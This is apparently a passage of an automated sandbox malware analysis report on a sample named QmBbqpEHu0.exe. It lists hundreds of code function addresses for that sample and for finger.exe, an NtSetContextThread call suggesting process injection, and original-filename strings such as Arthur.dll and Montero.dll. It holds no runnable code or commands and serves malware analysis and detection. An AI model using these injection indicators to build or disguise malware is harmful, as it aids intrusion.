                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_032EFB66 NtSetContextThread,10_2_032EFB66
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_032EF9B8 NtClose,10_2_032EF9B8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_027A3E280_2_027A3E28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_027AE1040_2_027AE104
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_027A6F900_2_027A6F90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_074765C00_2_074765C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747DDF00_2_0747DDF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747F4180_2_0747F418
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07477CAA0_2_07477CAA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07478B280_2_07478B28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747E3E80_2_0747E3E8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_074777080_2_07477708
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747E7D00_2_0747E7D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747E7E00_2_0747E7E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747AE080_2_0747AE08
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747AE180_2_0747AE18
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747654D0_2_0747654D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_074765210_2_07476521
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747DDE20_2_0747DDE2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747AC010_2_0747AC01
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747F4080_2_0747F408
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747AC100_2_0747AC10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747E3D80_2_0747E3D8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747EB900_2_0747EB90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07475A600_2_07475A60
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_074772710_2_07477271
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747B2790_2_0747B279
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07479A080_2_07479A08
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07478A100_2_07478A10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07478ACA0_2_07478ACA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_074799F90_2_074799F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747B0990_2_0747B099
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747E0980_2_0747E098
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747B0A80_2_0747B0A8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0747E0A80_2_0747E0A8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0765DFC80_2_0765DFC8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_076566820_2_07656682
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_076505E00_2_076505E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_076505F00_2_076505F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_076575D80_2_076575D8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_076592400_2_07659240
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_076592500_2_07659250
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_076500400_2_07650040
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_0765001D0_2_0765001D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07657E480_2_07657E48
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07659C000_2_07659C00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 0_2_07657A100_2_07657A10
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00418C334_2_00418C33
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004029E04_2_004029E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004011B04_2_004011B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004032204_2_00403220
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0042F3D34_2_0042F3D3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0041044B4_2_0041044B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004104534_2_00410453
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00401CC04_2_00401CC0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00401CB64_2_00401CB6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0040E6534_2_0040E653
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00402E6F4_2_00402E6F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00402E704_2_00402E70
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004106734_2_00410673
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00416E334_2_00416E33
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0040272C4_2_0040272C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_004027304_2_00402730
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0040E7A34_2_0040E7A3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106A1184_2_0106A118
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010581584_2_01058158
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010901AA4_2_010901AA
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010841A24_2_010841A2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010881CC4_2_010881CC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010620004_2_01062000
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC01004_2_00FC0100
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108A3524_2_0108A352
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010903E64_2_010903E6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE3F04_2_00FDE3F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010702744_2_01070274
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010502C04_2_010502C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010905914_2_01090591
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010744204_2_01074420
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010824464_2_01082446
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD05354_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107E4F64_2_0107E4F6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEC6E04_2_00FEC6E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCC7C04_2_00FCC7C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD07704_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF47504_2_00FF4750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE8F04_2_00FFE8F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB68B84_2_00FB68B8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0109A9A64_2_0109A9A6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD28404_2_00FD2840
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDA8404_2_00FDA840
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A04_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE69624_2_00FE6962
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108AB404_2_0108AB40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA804_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01086BD74_2_01086BD7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0CF24_2_00FC0CF2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106CD1F4_2_0106CD1F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0C004_2_00FD0C00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCADE04_2_00FCADE0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE8DBF4_2_00FE8DBF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01070CB54_2_01070CB5
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDAD004_2_00FDAD00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01012F284_2_01012F28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01072F304_2_01072F30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01044F404_2_01044F40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2E904_2_00FE2E90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0E594_2_00FD0E59
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104EFA04_2_0104EFA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108EE264_2_0108EE26
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC2FC84_2_00FC2FC8
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108CE934_2_0108CE93
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF0F304_2_00FF0F30
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108EEDB4_2_0108EEDB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD70C04_2_00FD70C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0109B16B4_2_0109B16B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100516C4_2_0100516C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDB1B04_2_00FDB1B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBF1724_2_00FBF172
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107F0CC4_2_0107F0CC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010870E94_2_010870E9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108F0E04_2_0108F0E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FED2F04_2_00FED2F0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108132D4_2_0108132D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEB2C04_2_00FEB2C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD52A04_2_00FD52A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0101739A4_2_0101739A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FBD34C4_2_00FBD34C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010712ED4_2_010712ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010875714_2_01087571
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC14604_2_00FC1460
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106D5B04_2_0106D5B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010995C34_2_010995C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108F43F4_2_0108F43F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108F7B04_2_0108F7B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010156304_2_01015630
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010816CC4_2_010816CC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010659104_2_01065910
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD38E04_2_00FD38E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103D8004_2_0103D800
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD99504_2_00FD9950
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEB9504_2_00FEB950
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FB764_2_0108FB76
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01045BF04_2_01045BF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100DBF94_2_0100DBF9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FA494_2_0108FA49
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01087A464_2_01087A46
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01043A6C4_2_01043A6C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEFB804_2_00FEFB80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01015AA04_2_01015AA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01071AA34_2_01071AA3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106DAAC4_2_0106DAAC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107DAC64_2_0107DAC6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01081D5A4_2_01081D5A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01087D734_2_01087D73
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01049C324_2_01049C32
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEFDC04_2_00FEFDC0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD3D404_2_00FD3D40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FCF24_2_0108FCF2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FF094_2_0108FF09
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD9EB04_2_00FD9EB0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108FFB14_2_0108FFB1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD1F924_2_00FD1F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AA35210_2_035AA352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035B03E610_2_035B03E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034FE3F010_2_034FE3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0359027410_2_03590274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035702C010_2_035702C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0357815810_2_03578158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0358A11810_2_0358A118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034E010010_2_034E0100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A81CC10_2_035A81CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035B01AA10_2_035B01AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A41A210_2_035A41A2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0358200010_2_03582000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0351475010_2_03514750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F077010_2_034F0770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034EC7C010_2_034EC7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0350C6E010_2_0350C6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F053510_2_034F0535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035B059110_2_035B0591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A244610_2_035A2446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0359442010_2_03594420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0359E4F610_2_0359E4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AAB4010_2_035AAB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A6BD710_2_035A6BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034EEA8010_2_034EEA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0350696210_2_03506962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F29A010_2_034F29A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035BA9A610_2_035BA9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F284010_2_034F2840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034FA84010_2_034FA840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0351E8F010_2_0351E8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034D68B810_2_034D68B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03564F4010_2_03564F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03510F3010_2_03510F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03592F3010_2_03592F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03532F2810_2_03532F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034E2FC810_2_034E2FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0356EFA010_2_0356EFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F0E5910_2_034F0E59
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AEE2610_2_035AEE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AEEDB10_2_035AEEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03502E9010_2_03502E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035ACE9310_2_035ACE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0358CD1F10_2_0358CD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034FAD0010_2_034FAD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034EADE010_2_034EADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03508DBF10_2_03508DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F0C0010_2_034F0C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034E0CF210_2_034E0CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03590CB510_2_03590CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034DD34C10_2_034DD34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A132D10_2_035A132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0353739A10_2_0353739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0350B2C010_2_0350B2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0350D2F010_2_0350D2F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035912ED10_2_035912ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F52A010_2_034F52A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035BB16B10_2_035BB16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0352516C10_2_0352516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034DF17210_2_034DF172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034FB1B010_2_034FB1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F70C010_2_034F70C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0359F0CC10_2_0359F0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A70E910_2_035A70E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AF0E010_2_035AF0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AF7B010_2_035AF7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0353563010_2_03535630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A16CC10_2_035A16CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A757110_2_035A7571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0358D5B010_2_0358D5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034E146010_2_034E1460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AF43F10_2_035AF43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AFB7610_2_035AFB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03565BF010_2_03565BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0352DBF910_2_0352DBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0350FB8010_2_0350FB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AFA4910_2_035AFA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A7A4610_2_035A7A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03563A6C10_2_03563A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0359DAC610_2_0359DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03535AA010_2_03535AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0358DAAC10_2_0358DAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03591AA310_2_03591AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0350B95010_2_0350B950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F995010_2_034F9950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0358591010_2_03585910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0355D80010_2_0355D800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F38E010_2_034F38E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AFF0910_2_035AFF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034B3FD210_2_034B3FD2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034B3FD510_2_034B3FD5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F1F9210_2_034F1F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AFFB110_2_035AFFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F9EB010_2_034F9EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A1D5A10_2_035A1D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_034F3D4010_2_034F3D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035A7D7310_2_035A7D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_0350FDC010_2_0350FDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_03569C3210_2_03569C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_035AFCF210_2_035AFCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009B20C010_2_009B20C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009B87A010_2_009B87A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009C257010_2_009C2570
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009ACFB010_2_009ACFB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009ACFA810_2_009ACFA8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009AB1B010_2_009AB1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009AD1D010_2_009AD1D0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009AB30010_2_009AB300
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009B579010_2_009B5790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009B579010_2_009B5790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009B399010_2_009B3990
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_009CBF3010_2_009CBF30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_032EE32810_2_032EE328
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_032EE7DC10_2_032EE7DC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_032EE44310_2_032EE443
                Source: C:\Windows\SysWOW64\finger.exeCode function: 10_2_032ED8A810_2_032ED8A8
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03537E54 appears 99 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0356F290 appears 103 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 034DB970 appears 262 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0355EA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03525130 appears 58 times
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: String function: 0104F290 appears 103 times
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: String function: 01017E54 appears 107 times
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: String function: 00FBB970 appears 262 times
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: String function: 0103EA12 appears 86 times
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: String function: 01005130 appears 58 times
                Source: QmBbqpEHu0.exe, 00000000.00000002.3597509427.0000000003941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs QmBbqpEHu0.exe
                Source: QmBbqpEHu0.exe, 00000000.00000000.1729638967.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHszP.exe: vs QmBbqpEHu0.exe
                Source: QmBbqpEHu0.exe, 00000000.00000002.3617403660.0000000008CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs QmBbqpEHu0.exe
                Source: QmBbqpEHu0.exe, 00000000.00000002.3615688071.0000000007410000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs QmBbqpEHu0.exe
                Source: QmBbqpEHu0.exe, 00000000.00000002.3587047984.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QmBbqpEHu0.exe
                Source: QmBbqpEHu0.exe, 00000004.00000002.2285918657.00000000010BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QmBbqpEHu0.exe
